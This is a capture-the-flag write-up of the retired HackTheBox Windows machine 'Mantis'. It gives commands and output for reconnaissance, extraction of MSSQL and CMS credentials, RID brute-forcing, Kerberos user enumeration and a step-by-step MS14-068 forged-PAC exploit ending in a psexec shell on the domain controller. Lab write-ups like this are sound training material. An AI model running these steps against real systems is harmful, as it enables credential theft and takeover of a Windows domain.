Mantis


HackTheBox

Mantis - HackTheBox - Windows Box

This writeup is for one of the Retired boxes on HackTheBox called Mantis [1].

Step 1 - Recon

I started my reconnaissance with Nmap, UDP Proto Scanner, Nikto and Dirbuster. Starting with Nmap on host 10.10.10.52 we have

nmap -sS -A -T5 --top-ports 1000 10.10.10.52

Host is up (0.039s latency).
Not shown: 685 closed ports, 299 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2018-01-18 16:05:34Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
636/tcp   open  tcpwrapped
1337/tcp  open  waste
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: MANTIS
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: mantis.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-01-18T06:55:10
|_Not valid after:  2048-01-18T06:55:10
|_ssl-date: 2018-01-18T16:06:33+00:00; 0s from scanner time.
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
8080/tcp  open  http         Microsoft IIS httpd 7.5
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
47001/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC

From nmap we can see that there are two http ports open 1337 and 8080. So using Dirbuster and the directory-list-2.3-medium.txt list on port 1337 we have two directories.

 /orchard/
 /secure_notes/

On port 8080 we have:

 /blogs
 /admin
 /tags
 /Archive
 /pollArchive
 /Blogs
 /newsarchive
 /news_archive
 /Admin

Output from Nikto on both ports:

 Port 8080

 + Server: Microsoft-IIS/7.5
 + Retrieved x-aspnet-version header: 4.0.30319
 + Retrieved x-powered-by header: ASP.NET
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + Uncommon header 'x-generator' found, with contents: Orchard
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
 + OSVDB-3092: /archive/a_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
 + OSVDB-3092: /archive/l_domlog.nsf: This database can be read without authentication, which may reveal sensitive information.
 + 7448 requests: 0 error(s) and 9 item(s) reported on remote host

 Port 1337

 + Server: Microsoft-IIS/7.5
 + Retrieved x-powered-by header: ASP.NET
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + Retrieved x-aspnet-version header: 2.0.50727
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + /: Appears to be a default IIS 7 install.

Step 2 - Exploitation

Accessing http://mantis.htb:1337/secure_notes/ I found

 /dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt
 /web.config

There is a base64 encoded string at the name of the first file

 echo -n NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx | base64 --decode
 6d2424716c5f53405f504073735730726421

 echo -n 6d2424716c5f53405f504073735730726421 | xxd -r -ps
 m$$ql_S@_P@ssW0rd!

So, I have a password and based on the contents it is probably the admin's password for the MS-SQL service running on the box.

Now that we have a username and password lets enumerate the MSSQL server with Metasploit's enumeration module [2,3].

 Enumerate mssql

 msf auxiliary(mssql_enum)> run

 [*] 10.10.10.52:1433 - Running MS SQL Server Enumeration...
 [*] 10.10.10.52:1433 - Version:
 [*]	Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
 [*]		Feb 20 2014 20:04:26
 [*]		Copyright (c) Microsoft Corporation
 [*]		Express Edition (64-bit) on Windows NT 6.1  (Build 7601: Service Pack 1) (Hypervisor)
 [*] 10.10.10.52:1433 - Configuration Parameters:
 [*] 10.10.10.52:1433 - 	C2 Audit Mode is Not Enabled
 [*] 10.10.10.52:1433 - 	xp_cmdshell is Not Enabled
 [*] 10.10.10.52:1433 - 	remote access is Enabled
 [*] 10.10.10.52:1433 - 	allow updates is Not Enabled
 [*] 10.10.10.52:1433 - 	Database Mail XPs is Not Enabled
 [*] 10.10.10.52:1433 - 	Ole Automation Procedures are Not Enabled
 [*] 10.10.10.52:1433 - Databases on the server:
 [*] 10.10.10.52:1433 - 	Database name:master
 [*] 10.10.10.52:1433 - 	Database Files for master:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\master.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\mastlog.ldf
 [*] 10.10.10.52:1433 - 	Database name:tempdb
 [*] 10.10.10.52:1433 - 	Database Files for tempdb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\tempdb.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\templog.ldf
 [*] 10.10.10.52:1433 - 	Database name:model
 [*] 10.10.10.52:1433 - 	Database Files for model:
 [*] 10.10.10.52:1433 - 	Database name:msdb
 [*] 10.10.10.52:1433 - 	Database Files for msdb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\MSDBData.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\MSDBLog.ldf
 [*] 10.10.10.52:1433 - 	Database name:orcharddb
 [*] 10.10.10.52:1433 - 	Database Files for orcharddb:
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\orcharddb.mdf
 [*] 10.10.10.52:1433 - 		C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\DATA\orcharddb_log.ldf
 [*] 10.10.10.52:1433 - System Logins on this Server:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - 	admin
 [*] 10.10.10.52:1433 - Disabled Accounts:
 [*] 10.10.10.52:1433 - 	No Disabled Logins Found
 [*] 10.10.10.52:1433 - No Accounts Policy is set for:
 [*] 10.10.10.52:1433 - 	All System Accounts have the Windows Account Policy Applied to them.
 [*] 10.10.10.52:1433 - Password Expiration is not checked for:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - 	admin
 [*] 10.10.10.52:1433 - System Admin Logins on this Server:
 [*] 10.10.10.52:1433 - 	sa
 [*] 10.10.10.52:1433 - Windows Logins on this Server:
 [*] 10.10.10.52:1433 - 	No Windows logins found!
 [*] 10.10.10.52:1433 - Windows Groups that can logins on this Server:
 [*] 10.10.10.52:1433 - 	No Windows Groups where found with permission to login to system.
 [*] 10.10.10.52:1433 - Accounts with Username and Password being the same:
 [*] 10.10.10.52:1433 - 	No Account with its password being the same as its username was found.
 [*] 10.10.10.52:1433 - Accounts with empty password:
 [*] 10.10.10.52:1433 - 	No Accounts with empty passwords where found.
 [*] 10.10.10.52:1433 - Stored Procedures with Public Execute Permission found:
 [*] 10.10.10.52:1433 - 	sp_replsetsyncstatus
 [*] 10.10.10.52:1433 - 	sp_replcounters
 [*] 10.10.10.52:1433 - 	sp_replsendtoqueue
 [*] 10.10.10.52:1433 - 	sp_resyncexecutesql
 [*] 10.10.10.52:1433 - 	sp_prepexecrpc
 [*] 10.10.10.52:1433 - 	sp_repltrans
 [*] 10.10.10.52:1433 - 	sp_xml_preparedocument
 [*] 10.10.10.52:1433 - 	xp_qv
 [*] 10.10.10.52:1433 - 	xp_getnetname
 [*] 10.10.10.52:1433 - 	sp_releaseschemalock
 [*] 10.10.10.52:1433 - 	sp_refreshview
 [*] 10.10.10.52:1433 - 	sp_replcmds
 [*] 10.10.10.52:1433 - 	sp_unprepare
 [*] 10.10.10.52:1433 - 	sp_resyncprepare
 [*] 10.10.10.52:1433 - 	sp_createorphan
 [*] 10.10.10.52:1433 - 	xp_dirtree
 [*] 10.10.10.52:1433 - 	sp_replwritetovarbin
 [*] 10.10.10.52:1433 - 	sp_replsetoriginator
 [*] 10.10.10.52:1433 - 	sp_xml_removedocument
 [*] 10.10.10.52:1433 - 	sp_repldone
 [*] 10.10.10.52:1433 - 	sp_reset_connection
 [*] 10.10.10.52:1433 - 	xp_fileexist
 [*] 10.10.10.52:1433 - 	xp_fixeddrives
 [*] 10.10.10.52:1433 - 	sp_getschemalock
 [*] 10.10.10.52:1433 - 	sp_prepexec
 [*] 10.10.10.52:1433 - 	xp_revokelogin
 [*] 10.10.10.52:1433 - 	sp_resyncuniquetable
 [*] 10.10.10.52:1433 - 	sp_replflush
 [*] 10.10.10.52:1433 - 	sp_resyncexecute
 [*] 10.10.10.52:1433 - 	xp_grantlogin
 [*] 10.10.10.52:1433 - 	sp_droporphans
 [*] 10.10.10.52:1433 - 	xp_regread
 [*] 10.10.10.52:1433 - 	sp_getbindtoken
 [*] 10.10.10.52:1433 - 	sp_replincrementlsn
 [*] 10.10.10.52:1433 - Instances found on this server:
 [*] 10.10.10.52:1433 - Default Server Instance SQL Server Service is running under the privilege of:
 [*] 10.10.10.52:1433 - 	xp_regread might be disabled in this system
 [*] Auxiliary module execution completed

... and more enum ...

 use auxiliary/admin/mssql/mssql_enum_domain_accounts

 Attempting to connect to the database server at 10.10.10.52:1433 as admin...
 [+] 10.10.10.52:1433 - Connected.
 [*] 10.10.10.52:1433 - SQL Server Name: MANTIS
 [*] 10.10.10.52:1433 - Domain Name: HTB
 [+] 10.10.10.52:1433 - Found the domain sid: 0105000000000005150000008cc188fb194b8eef799898ac
 [*] 10.10.10.52:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
 [*] 10.10.10.52:1433 -  - HTB\Administrator
 [*] 10.10.10.52:1433 -  - HTB\Guest
 [*] 10.10.10.52:1433 -  - HTB\krbtgt
 [*] 10.10.10.52:1433 -  - HTB\Domain Admins
 [*] 10.10.10.52:1433 -  - HTB\Domain Users
 [*] 10.10.10.52:1433 -  - HTB\Domain Guests
 [*] 10.10.10.52:1433 -  - HTB\Domain Computers
 [*] 10.10.10.52:1433 -  - HTB\Domain Controllers
 [*] 10.10.10.52:1433 -  - HTB\Cert Publishers
 [*] 10.10.10.52:1433 -  - HTB\Schema Admins
 [*] 10.10.10.52:1433 -  - HTB\Enterprise Admins
 [*] 10.10.10.52:1433 -  - HTB\Group Policy Creator Owners
 [*] 10.10.10.52:1433 -  - HTB\Read-only Domain Controllers
 [*] 10.10.10.52:1433 -  - HTB\RAS and IAS Servers
 [*] 10.10.10.52:1433 -  - HTB\Allowed RODC Password Replication Group
 [*] 10.10.10.52:1433 -  - HTB\Denied RODC Password Replication Group
 [*] 10.10.10.52:1433 -  - HTB\MANTIS$
 [*] 10.10.10.52:1433 -  - HTB\DnsAdmins
 [*] 10.10.10.52:1433 -  - HTB\DnsUpdateProxy
 [*] 10.10.10.52:1433 -  - HTB\james
 [*] 10.10.10.52:1433 -  - HTB\SQLServer2005SQLBrowserUser$MANTIS
 [+] 10.10.10.52:1433 - 22 user accounts, groups, and computer accounts were found.

Using auxiliary/admin/mssql/mssql_sql from Metasploit we can run queries against the MSSQL service.

 msf > set sql SELECT name FROM master..sysdatabases;

 msf auxiliary(mssql_sql) > exploit

 [*] 10.10.10.52:1433 - SQL Query: SELECT name FROM master..sysdatabases;
 [*] 10.10.10.52:1433 - Row Count: 5 (Status: 16 Command: 193)

  name
  ----
  master
  tempdb
  model
  msdb
  orcharddb

 msf > set sql USE orcharddb; SELECT * FROM information_schema.tables;
 msf > set sql USE orcharddb; SELECT * FROM blog_Orchard_Users_UserPartRecord;
 msf > set sql "USE orcharddb; SELECT *  FROM information_schema.columns WHERE table_name='blog_Orchard_Users_UserPartRecord';"
 msf > set sql "USE orcharddb; SELECT UserName FROM blog_Orchard_Users_UserPartRecord;"

  UserName
  --------
  admin
  James

 msf > set sql "USE orcharddb; SELECT Password FROM blog_Orchard_Users_UserPartRecord;"

  Password
  --------
  AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==
  J@m3s_P@ssW0rd!

 msf > set sql "USE orcharddb; SELECT UserName, Password, HashAlgorithm, PasswordSalt FROM blog_Orchard_Users_UserPartRecord;"

  UserName  Password                                                              HashAlgorithm  PasswordSalt
  --------  --------                                                              -------------  ------------
  admin     AL1337E2D6YHm0iIysVzG8LA76OozgMSlyOJk1Ov5WCGK+lgKY6vrQuswfWHKZn2+A==  PBKDF2         UBwWF1CQCsaGc/P7jIR/kg==
  James     J@m3s_P@ssW0rd!                                                       Plaintext      NA

I changed the admin's password to something simpler and then tried to login into the OrchandCMS's login portal, but there was not anything helpful in there. However, I have the user James password and just to validate if its his domain credentials we can try:

 smbexec.py htb.local/james:'J@m3s_P@ssW0rd!'@10.10.10.52
 [-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

  use auxiliary/scanner/smb/smb_login
  msf auxiliary(smb_login) > set smbuser james
  msf auxiliary(smb_login) > set smbpass J@m3s_P@ssW0rd!
  msf auxiliary(smb_login) > set rhosts 10.10.10.52
  msf auxiliary(smb_login) > set smbdomain htb.local
  msf auxiliary(smb_login) > exploit

  [*] 10.10.10.52:445       - SMB - Starting SMB login bruteforce
  [*] 10.10.10.52:445       - This system does not accept authentication with any credentials, proceeding with brute force
  [+] 10.10.10.52:445       - SMB - Success: 'htb.local\james:J@m3s_P@ssW0rd!'
  [*] 10.10.10.52:445       - SMB - Domain is ignored for user james
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

So, we have user James domain credentials but the SMB exploit cannot be used to gain access to the system. I then moved to the other services open on the box and tried to exploit the Kerberos authentication.

 use auxiliary/gather/kerberos_enumusers (Domain: htb.local)

 msf auxiliary(kerberos_enumusers) > set domain htb.local
 msf auxiliary(kerberos_enumusers) > set rhost 10.10.10.52
 msf auxiliary(kerberos_enumusers) > set user_file ~/Downloads/mantis/kerberos
 msf auxiliary(kerberos_enumusers) > exploit

 [*] Validating options...
 [*] Using domain: HTB.LOCAL...
 [*] 10.10.10.52:88 - Testing User: "admin"...
 [*] 10.10.10.52:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
 [*] 10.10.10.52:88 - User: "admin" does not exist
 [*] 10.10.10.52:88 - Testing User: "james"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "james" is present
 [*] 10.10.10.52:88 - Testing User: "administrator"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "administrator" is present
 [*] 10.10.10.52:88 - Testing User: "mantis"...
 [*] 10.10.10.52:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
 [+] 10.10.10.52:88 - User: "mantis" is present



 java -jar krbguess.jar -r htb.local -d ~/Downloads/mantis/kerberos -s 10.10.10.52
 KrbGuess v0.21 by Patrik Karlsson 
 ====================================================
 [INF] Found user: james@htb.local
 [INF] Found user: mantis@htb.local
 [INF] Found user: administrator@htb.local

 use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
 msf auxiliary(ms14_068_kerberos_checksum) > show options

 Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
    PASSWORD                   yes       The Domain User password
    RHOST                      yes       The target address
    RPORT     88               yes       The target port
    Timeout   10               yes       The TCP timeout to establish connection and read data
    USER                       yes       The Domain User
    USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

 msf auxiliary(ms14_068_kerberos_checksum) > set domain htb.local
 msf auxiliary(ms14_068_kerberos_checksum) > set user james
 msf auxiliary(ms14_068_kerberos_checksum) > set password J@m3s_P@ssW0rd!
 msf auxiliary(ms14_068_kerberos_checksum) > set rhost 10.10.10.52

 Use rpcclient to find user's SID

 rpcclient 10.10.10.52 -W htb.local -U james
 Enter HTB.LOCAL\james's password:
 rpcclient $> lookupnames james
 james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)

 msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-4220043660-4019079961-2895681657-1103
 msf auxiliary(ms14_068_kerberos_checksum) > exploit

 [*] Validating options...
 [*] Using domain HTB.LOCAL...
 [*] 10.10.10.52:88 - Sending AS-REQ...
 [*] 10.10.10.52:88 - Parsing AS-REP...
 [*] 10.10.10.52:88 - Sending TGS-REQ...
 [+] 10.10.10.52:88 - Valid TGS-Response, extracting credentials...
 [+] 10.10.10.52:88 - MIT Credential Cache saved on /root/.msf4/loot/20180206105619_default_10.10.10.52_windows.kerberos_865929.bin
 [*] Auxiliary module execution completed

Based on what we found so far the exploit to use is MS14-068 Forged PAC Exploit, exploitation of the Kerberos vulnerability on Domain Controllers [4,5,6]. The specific exploit allows an attacker to become a Domain Administrator with any user account. The steps were taken from [7].

Steps to Exploit MS14-068

 1. apt-get install krb5-user cifs-utils git

 2. net time -S 10.10.10.52 -U "james"
 Tue Feb  6 11:42:48 2018
 (Check if time is the same)

 3. root@kali:~/.msf4/loot# mv /etc/krb5.conf /etc/backup_krb5.conf

 cat /etc/krb5.conf

 default_real = MANTIS.HTB.LOCAL
 dns_lookup_real = true
 dns_lookup_kdc = true

 [realms]
 	TARGET.LOCAL = {
	 kdc = MANTIS.HTB.LOCAL:88
	 admin_server = MANTIS.HTB.LOCAL
	 default_domain = htb.local
	}
 [domain_realm]
	.htb.local	= HTB.LOCAL
	htb.local	= HTB.LOCAL

 4. cat /etc/hosts

 10.10.10.52	mantis.htb mantis.htb.local mantis

 5. cat /etc/resolv.conf
 nameserver 10.10.10.52
 nameserver 10.2...

 6. kinit or kinit james@HTB.LOCAL
 kinit USER@TARGET.LOCAL

 #get exploits from https://github.com/bidord/pykek

 7. Find User's SID
 S-1-5-21-4220043660-4019079961-2895681657-1103

 8. run exploit
 python ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local

 9. move modified creds to the location where they can be used by local kerberos
 mv TGT_*.ccache /tmp/krb5cc_0

 #### https://artkond.com/2016/12/18/pivoting-kerberos/

 10. export KRB5CCNAME='/tmp/krb5cc_0'

 11. https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

 psexec.py -k -n htb.local/james@mantis cmd
 -k === Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line




References

[1] HackTheBox
[2] Attacking MS-SQL with Metasploit
[3] Pentest Microsoft SQL Server
[4] Exploiting MS014-068
[5] Exploiting MS14-068 Vulnerable Domain Controllers using PyKEK
[6] MS14-068 Vulnerability
[7] Exploit MS014-068